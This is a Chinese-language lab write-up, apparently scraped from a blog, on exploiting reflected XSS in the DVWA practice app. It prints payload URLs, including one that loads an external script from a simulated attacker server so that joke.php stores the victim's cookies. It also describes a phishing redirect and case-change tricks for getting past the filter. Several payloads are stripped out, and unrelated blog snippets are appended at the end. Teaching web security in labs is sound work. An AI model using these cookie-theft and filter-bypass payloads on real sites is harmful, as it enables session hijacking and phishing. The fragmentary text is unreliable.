1.先判斷有誤xss漏洞
輸入值得注意的是輸入 沒有反應
顯示如下
惡意url為:http://localhost/dvwa/vulnerabilities/xss_r/?name=%3cscript%3ealert%28%2fxss%2f%29%3c%2fscript%3e#
獲取cookie
首先在www檔案下建立乙個名為joke的資料夾(模擬攻擊者伺服器)
joke.php的作用是把joke變數儲存的cookie儲存到伺服器中
在輸入,使得伺服器呼叫joke.js指令碼
joke.js再呼叫joke.php
惡意:http://localhost/dvwa/vulnerabilities/xss_r/?name=%3cscript+src%3dhttp%3a%2f%2flocalhost%2fjoke%2fjoke.js%3e%3c%2fscript%3e#
在伺服器中找到了乙個記錄著cookie的檔案
重定向**
惡意url localhost/dvwa/vulnerabilities/xss_r/?name=
會重定向到乙個釣魚**。
原始碼分析:
";reflected xss source
直接把使用者的輸入賦值給了name沒有做任何的過濾<?php
header ("x-xss-protection: 0");
// is there any input?
if( array_key_exists( "name", $_get ) && $_get[ 'name' ] != null )
?>
輸入已經失效了
但當輸入卻成功了,意味著沒有對大小寫進行過濾
輸入便可能到cookie
惡意url:
原始碼分析
reflected xss source
<?php
header ("x-xss-protection: 0");
// is there any input?
if( array_key_exists( "name", $_get ) && $_get[ 'name' ] != null )
}?>
preg_replace 函式執行乙個正規表示式的搜尋和替換
mixed preg_replace搜尋 subject 中匹配 pattern 的部分, 以 replacement 進行替換。(mixed $pattern
,mixed $replacement
,mixed $subject
[,int
$limit =-
1[,int&
$count
]])
引數說明:
$name = preg_replace( '/
/i表示不區分大小寫,且從/開始匹配,只要匹配到 script中的任乙個字元都將自動替換為空格
就算是輸入了自己的思路是把最普通的xss**
在當前頁面彈出cookie
外部呼叫攻擊**ls.js
跳轉某頁面
當使用了黑名單過濾標籤時,使用以下
框架
DVWA之XSS(反射型)
伺服器 low array key exists key,array 函式檢查某個陣列中是否存在指定的鍵名,如果鍵名存在則返回 true,如果鍵名不存在則返回 false。可以看出 只是判斷name是否存在是否為空,並沒有任何的過濾。漏洞利用 伺服器端 medium str replace find...
DVWA實驗儲存型XSS
直接輸入測試,只要檢視這個日誌就會彈出這個資訊,依法炮製試試獲取cookie 輸入,發現並未能獲取到任何資料,經過檢視發現message裡面有字數限制,則只需要進行抓包修改即可。因為是做實驗可以,把檔名什麼的修改的短一點能輸入就能獲取。那麼接下來嘗試視窗的跳轉 輸入即可跳轉 實驗證明少了http 或...
DVWA 反射型XSS 全級別
1.low級別 header x xss protection 0 is there any input?if array key exists name get get name null 分析 沒有過濾 解 alert 123 script 2.medium級別 header x xss pro...